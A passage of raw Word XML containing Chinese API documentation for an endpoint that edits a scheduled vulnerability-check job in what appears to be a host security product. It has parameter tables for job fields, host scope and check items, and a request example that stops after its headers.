    <w:p w14:paraId="5C644A69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E878819" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/{linux|win}/fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007CD46B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>与新增作业相比，jobId必传。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEDBC3A"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2330"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="4207"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="24205C7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E5ACF1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CC8933B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25C5167A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14FC0A35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15208EFF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0887E01B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FAD18FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EA4900F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A374360" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6536A251" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D1A8D4D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EAB9373" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37445967" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="542687DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业名称，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="41821866" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BFDDB62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>cronEnabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54D63643" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38EC8554" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64C3AAF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否定时, 不传时为不定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="47156BF3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36EEDF04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04EE6DC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49F53BA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FFEA539" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnabled=true时必填，cron任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="17871CA5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BDB26DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="416EC11B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50F2F3F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13860554" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否启用，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6CB03A18" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3562911A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21655DE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48D01706" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72100C2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行范围，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C326D6E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FB18E73" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19B2A2A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7515AD96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BB14F0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行范围名称，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F44F7D9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="759CE847" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F87EB66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C5E686B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD8ABD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6674D669" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43E52822" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pocTaskCreateParams</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49417432" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F1385D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B019318" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测项列表，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B525A0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>参数说明：</w:t>
      </w:r>
      <w:r>
        <w:t>realm</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="888"/>
        <w:gridCol w:w="1088"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="7036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="67E3F0B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15591BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AC50AE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="143F1FF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54B96852" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2FFF1AB2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E96C85E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69918BD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FAEEB89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="448EA93B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>范围，0:全部主机,type为0时，agents和groups不传; 1:主机范围，如果type=1, 则agents必传; 2:业务组范围，如果type=2,则groups必传 不传时为0全部主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A046771" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68AFE578" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F031F62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75D7D6ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="745D4A9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Linux业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="123AC018" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56011E02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03E92944" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22E0D6D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="269DE3D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Linux的主机agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72E81E66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>参数说明：</w:t>
      </w:r>
      <w:r>
        <w:t>pocTaskCreateParams</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1505"/>
        <w:gridCol w:w="2137"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="3373"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5F7DC9C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DE32C69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F2B8DA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64E589B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54E13A13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B2E23A3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77B21607" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="060402BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62E980E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3302BD8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险检查项Id，见4.5.6接口，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E3F61EB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0419E927" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeTypes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="711234D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6281F45F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E88B974" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测方式，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="125F592F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="709C58D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39096CED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Map&lt;String, Object&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39A48FBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="792B6F72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>输入参数，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6EED21C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A360153" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>POST /external/api/vul/poc/job/linux/fix</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
